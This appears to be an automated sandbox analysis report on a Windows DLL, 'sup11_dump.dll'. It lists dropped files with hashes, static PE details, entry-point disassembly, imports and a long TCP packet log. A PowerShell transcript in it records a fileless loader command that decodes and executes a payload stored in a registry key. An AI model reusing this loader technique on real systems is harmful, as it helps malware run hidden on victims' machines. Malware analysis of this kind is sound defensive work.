SHA-512:	EE83F260F88296A9C627345AD1D95425CDF13C52F973DEFBBDFC209BF5C152CA3B7CB57DDBDF9453DA381149A5E53102353253C7C98CE038EE3FBBCE86ED6BB7
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC69973D5BB3480E8.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	modified
Size (bytes):	29745
Entropy (8bit):	0.31254654734618603
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAggw9laAC9t:kBqoxxJhHWSVSEabwQ2y
MD5:	1A204E6A2604BB823A5F49183F8E3D20
SHA1:	788537FC22B74EA28F723C30F6BC55717F4C6CCF
SHA-256:	538036DB255EE5DEA01BC4320F91514F591296A83AE099CE2A59119586D765C4
SHA-512:	3CC98DE4C9E26C987FDB2A140287E572CD00E6C788ABBD97DB4832D99DED2A26F3E40EAEDC0762BE20035D03FE1FF12561DC001F007AF8D687DC2C5021C38DA8
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC755D5147CF6BDD9.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40209
Entropy (8bit):	0.6819539024707835
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+pHVEn+P27h5MUAhP27h5MUAuP27h5MUAr:kBqoxKAuqR+pHVEn+P8bcP8bLP8bU
MD5:	26F5CC3C1DB66BCC5EE7F20703EBFB61
SHA1:	293FBA058B824541F85DDB42531F0AE2F235FC5A
SHA-256:	1B0613C9EF7165299F0F59129B73752DD3A3D0A9A1690A1916ED956BE0B23E4E
SHA-512:	09580A0027B2B98FBD86278B0F2B969B2BCF9FB04A169D7016E90B372CDA484CA98AE442479044FFC0D3F56434923DE9258E90892241A40559475968A57CE319
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE1BCDF1B7A4F52FD.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	192120
Entropy (8bit):	3.1298876235669333
Encrypted:	false
SSDEEP:	3072:QZ/2BfcYmu5kLTzGt5Z/2Bfc/mu5kLTzGt:pY
MD5:	79CCD81DBE8697A81D86B9D8F6169983
SHA1:	ED7C2BF97125697C8EE6BA39480B5BE247E8943B
SHA-256:	34560A231A97C852130BE5627D528B95EE325193C34470ED5053F18CF664BD5D
SHA-512:	180A5B0383CA22F778215F1112B2E7925F3AFE6E0B16F5589E2F9D6E8E0F20EE27A2F8C44A0CBACC072DA2F0D8FE7909F3B3363CA5EF9A6641984295D0AB8E24
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NXNCVBL3Z3NQ4O4572U9.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.178836273126816
Encrypted:	false
SSDEEP:	48:mbdilmPoIyC9GrIoDAsASFnbdilmPoIyh683GrIoDAczEbdilmPoIyx9GrIoDAVt:mcmPos9SjAJ6cmPoN3SjA5cmPob9SjAf
MD5:	8E182804D37B9AAB770B82913FB1AC86
SHA1:	FC6856E0CB2FE8D3765B48F9B7F6AB75ED70C78F
SHA-256:	5FEC58D81FFE91F8B546C36ADD54BA5483D51C4420EE33E60304E643478FE89E
SHA-512:	638A222EC896CB720F40E9E3CBB862CE34BFFC063BE7829AD0D5343084827123D0B871BA0F969735FE9FCF6032C8D009E754241413103F26BF85CFFCF352571B
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>.....^.....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.{..PROGRA~1..t......L.>Q.{....E...............J........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.;R................................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J;R.......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......].............oR.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\Documents\20210126\PowerShell_transcript.960781.Boiw3hOA.20210126194530.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1197
Entropy (8bit):	5.322440806195349
Encrypted:	false
SSDEEP:	24:BxSA7dZOvBda7Qcx2DOXUWOLCHGIYBtLWZHjeTKKjX4CIym1ZJXROLCHGIYBtGtl:BZev6kcoORF/ZqDYB1ZNFXZZZ
MD5:	E1B6D39424401CE0197E804D6FA12E90
SHA1:	DD09A6B5C7443F96600674771C889CB8DED07BA0
SHA-256:	D410FBB0856F3DCED71FD190125DD2DE6F2570AE54CDDE9B77E3E243B0623EF1
SHA-512:	126B6EA7028EB1643120FEB4E88BF48BE137DDB58B7C4BA3A90047EFD0A5D87B759E622E008E5AFEEEDB9B28C69A98B314507CCC12A33828E66D54376069AA05
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210126194531..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 960781 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 6388..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210126194531..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..**************

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.01203376624661
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	sup11_dump.dll
File size:	61440
MD5:	92bcb08ab6be032cd4a64ac1292c2d16
SHA1:	dd1ee07155768a8d4b0cb1ec3fa666b5ac7e2eed
SHA256:	50ec326918e3930b8099b483ecf0a44bebba1fc7013cc234f2fbc358acb26fe5
SHA512:	29ba30a85fb276cf34669ddbf54e0bfe7b32abae4f3f217fc7754841e9fee1ee24c363d5eb5213740aa5c8b7a4831a5e9849b904d6182a07fe76c609f84d7aee
SSDEEP:	1536:GXvA5MoNRR/4DwOffSuekSjumPUtjxH8ITDM:GX45MGX/4bcu7tjp8J
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z.............q........n.............D.......D.......D........q.......q.......q......Rich............PE..L...T.._...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x40146a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x5FE08054 [Mon Dec 21 11:00:36 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	8bd3516d6fbaada236bf3f0ea3a6d71f

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+0Ch]
push ebx
push esi
xor ebx, ebx
push edi
inc ebx
xor edi, edi
sub eax, edi
mov dword ptr [ebp-04h], ebx
je 00007F715C800015h
dec eax
jne 00007F715C80005Fh
push 00404108h
call dword ptr [00403048h]
cmp eax, ebx
jne 00007F715C80004Ch
push edi
push 00400000h
push edi
call dword ptr [00403040h]
cmp eax, edi
mov dword ptr [00404110h], eax
je 00007F715C7FFFE0h
mov eax, dword ptr [ebp+08h]
mov esi, 00404118h
mov dword ptr [00404130h], eax
mov eax, esi
lock xadd dword ptr [eax], ebx
mov ecx, dword ptr [ebp+10h]
lea eax, dword ptr [ebp+0Ch]
push eax
push edi
call 00007F715C7FFEE8h
push eax
push 0040154Ah
push edi
push edi
call dword ptr [0040304Ch]
cmp eax, edi
mov dword ptr [0040410Ch], eax
jne 00007F715C7FFFFBh
or eax, FFFFFFFFh
lock xadd dword ptr [esi], eax
mov dword ptr [ebp-04h], edi
jmp 00007F715C7FFFEFh
push 00404108h
call dword ptr [0040303Ch]
test eax, eax
jne 00007F715C7FFFE0h
cmp dword ptr [0040410Ch], edi
je 00007F715C7FFFCCh
mov esi, 00002710h
push ebx
push 00000064h
call dword ptr [00403034h]
mov eax, dword ptr [00404118h]
test eax, eax
je 00007F715C7FFFA9h
sub esi, 64h
cmp esi, edi
jnle 00007F715C7FFF89h
push dword ptr [0040410Ch]
call dword ptr [00003050h]

Rich Headers

Programming Language:

[LNK] VS2005 build 50727
[EXP] VS2005 build 50727
[IMP] VS2008 SP1 build 30729
[ASM] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x35d0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x312c	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0x154	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3000	0xcc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2000	0x2000	False	0.506713867188	data	5.09404671982	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3000	0x1000	0x1000	False	0.256591796875	data	2.70691419034	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4000	0x1000	0x1000	False	0.016357421875	data	0.0602032822141	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss	0x5000	0x1000	0x1000	False	0.166015625	DOS executable (COM, 0x8C-variant)	1.72513008267	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x6000	0x9000	0x9000	False	0.884847005208	data	7.49744643427	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL	Import
SHLWAPI.dll	StrStrIA
KERNEL32.dll	HeapAlloc, GetLastError, VerLanguageNameA, Sleep, GetSystemTime, SwitchToThread, HeapFree, GetLocaleInfoA, ExitThread, lstrlenW, GetSystemDefaultUILanguage, SleepEx, WaitForSingleObject, InterlockedDecrement, HeapCreate, HeapDestroy, InterlockedIncrement, CreateThread, CloseHandle, GetExitCodeThread, GetModuleFileNameW, QueueUserAPC, TerminateThread, lstrlenA, GetSystemTimeAsFileTime, SetLastError, GetModuleHandleA, VirtualProtect, GetLongPathNameW, OpenProcess, GetVersion, GetCurrentProcessId, CreateEventA, GetProcAddress, LoadLibraryA, VirtualFree, VirtualAlloc, MapViewOfFile, CreateFileMappingW
ntdll.dll	_snwprintf, memcpy, memset, _aulldiv, RtlUnwind, NtQueryVirtualMemory
ADVAPI32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorA

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x402089

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 19:44:17.459254980 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.471765995 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.472732067 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.472805977 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.472856998 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.472979069 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.504081964 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.504196882 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.506138086 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.515450954 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.515993118 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.516550064 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.516575098 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.516604900 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.516623974 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.516629934 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.516664028 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.516706944 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.517067909 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.517076969 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.518554926 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.518816948 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.518893003 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.519063950 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.550807953 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.551657915 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.551681042 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.551697969 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.551930904 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.559186935 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.559313059 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.559880018 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560079098 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560230017 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560317993 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.560340881 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560343027 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.560354948 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.560435057 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560496092 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560611010 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560726881 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560836077 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.560946941 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.561050892 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.561206102 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.561450005 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.561513901 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.562123060 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.562342882 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.562362909 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.562427044 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.562694073 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.562782049 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.562803984 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.563035965 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.563055992 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.563071966 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.563087940 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.563131094 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.563146114 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.563167095 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.563185930 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.563210964 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.563221931 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.563230038 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.565742970 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.565808058 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.565835953 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.565854073 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.565891981 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.565928936 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.566159010 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.586282015 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.586659908 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.589936972 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.590338945 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.593310118 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.593396902 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.593719006 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.593800068 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.602766037 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.603121996 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.604255915 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.608700037 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.608850956 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.608870029 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.608892918 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.608930111 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.608935118 CET	443	49743	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.608971119 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.608997107 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.610198975 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.610443115 CET	49743	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.611021996 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611043930 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611062050 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611079931 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611100912 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611119032 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611131907 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.611135960 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611155033 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.611175060 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.611324072 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.612277031 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.612296104 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.612312078 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.612329960 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.612351894 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.612395048 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.613455057 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.613476038 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.613527060 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.613557100 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.614700079 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.614726067 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.614778042 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.614804983 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.615793943 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.615820885 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.615863085 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.615896940 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.616961956 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.616988897 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.617028952 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.617062092 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.618129969 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.618156910 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.618196964 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.618230104 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.619318962 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.619339943 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.619380951 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.619570971 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.620486021 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.620501995 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.620595932 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.621659994 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.621680975 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.621747971 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.621767998 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.629507065 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.629584074 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.629645109 CET	443	49740	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.629698992 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.631074905 CET	49740	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.632812977 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.632934093 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.634399891 CET	443	49739	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.634500027 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.636253119 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.636277914 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.636342049 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.636428118 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.636434078 CET	443	49741	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.636461973 CET	443	49742	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.636589050 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.636734009 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.640918970 CET	49739	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.641304970 CET	49742	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.641493082 CET	49741	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.651918888 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.651951075 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.651969910 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.651988029 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.651998043 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.652030945 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.652065039 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.653673887 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.653702974 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.653723001 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.653742075 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.653752089 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.653767109 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.653788090 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.653806925 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.653810978 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.653825998 CET	443	49738	151.101.1.44	192.168.2.7
Jan 26, 2021 19:44:17.653884888 CET	49738	443	192.168.2.7	151.101.1.44
Jan 26, 2021 19:44:17.654993057 CET	443	49738	151.101.1.44	192.168.2.7
